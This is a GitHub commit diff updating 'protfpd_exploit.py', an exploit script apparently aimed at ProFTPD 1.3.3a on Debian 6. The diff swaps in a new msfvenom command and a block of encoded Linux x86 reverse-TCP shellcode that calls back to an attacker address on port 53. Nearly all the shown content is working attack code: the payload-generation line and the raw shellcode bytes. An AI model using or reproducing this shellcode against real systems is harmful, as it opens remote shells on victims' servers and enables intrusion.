Skip to content

Commit 7e66168

Browse files
authored
Update protfpd_exploit.py
1 parent ab7246c commit 7e66168

File tree

1 file changed

+8
-8
lines changed

1 file changed

+8
-8
lines changed

protfpd_exploit.py

+8-8
Original file line numberDiff line numberDiff line change
@@ -2,16 +2,16 @@
22
import socket
33
import struct
44

5-
# msfvenom -a x86 -p linux/x86/shell_reverse_tcp LHOST=10.11.0.47 LPORT=53 -e x86/shikata_ga_nai -b "\x09\x0a\x0b\x0c\x0d\x20\xff" -f c
5+
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.47 LPORT=53 -e x86/shikata_ga_nai -b "\x09\x0a\x0b\x0c\x0d\x20\xff" -f c
66
# Payload size: 95 bytes
77
shellcode = (
8-
"\xba\xbf\xed\x1e\xfb\xda\xd8\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
9-
"\x12\x83\xee\xfc\x31\x56\x0e\x03\xe9\xe3\xfc\x0e\x24\x27\xf7"
10-
"\x12\x15\x94\xab\xbe\x9b\x93\xad\x8f\xfd\x6e\xad\x63\x58\xc1"
11-
"\x91\x4e\xda\x68\x97\xa9\xb2\x60\x6c\x4a\x6d\x1d\x70\x4a\x71"
12-
"\xe8\xfd\xab\xc1\x74\xae\x7a\x72\xca\x4d\xf4\x95\xe1\xd2\x54"
13-
"\x3d\x94\xfd\x2b\xd5\x00\x2d\xe3\x47\xb8\xb8\x18\xd5\x69\x32"
14-
"\x3f\x69\x86\x89\x40"
8+
"\xba\xa4\xf8\x5b\xa8\xd9\xc6\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
9+
"\x12\x83\xe8\xfc\x31\x50\x0e\x03\xf4\xf6\xb9\x5d\xc5\xdd\xc9"
10+
"\x7d\x76\xa1\x66\xe8\x7a\xac\x68\x5c\x1c\x63\xea\x0e\xb9\xcb"
11+
"\xd4\xfd\xb9\x65\x52\x07\xd1\x7f\xaf\xf7\x0e\xe8\xad\xf7\x50"
12+
"\xdd\x38\x16\xe0\x7b\x6b\x88\x53\x37\x88\xa3\xb2\xfa\x0f\xe1"
13+
"\x5c\x6b\x3f\x75\xf4\x1b\x10\x56\x66\xb5\xe7\x4b\x34\x16\x71"
14+
"\x6a\x08\x93\x4c\xed"
1515
)
1616

1717
# Debian 6 - ProFTPD 1.3.3a

0 commit comments

Comments
 (0)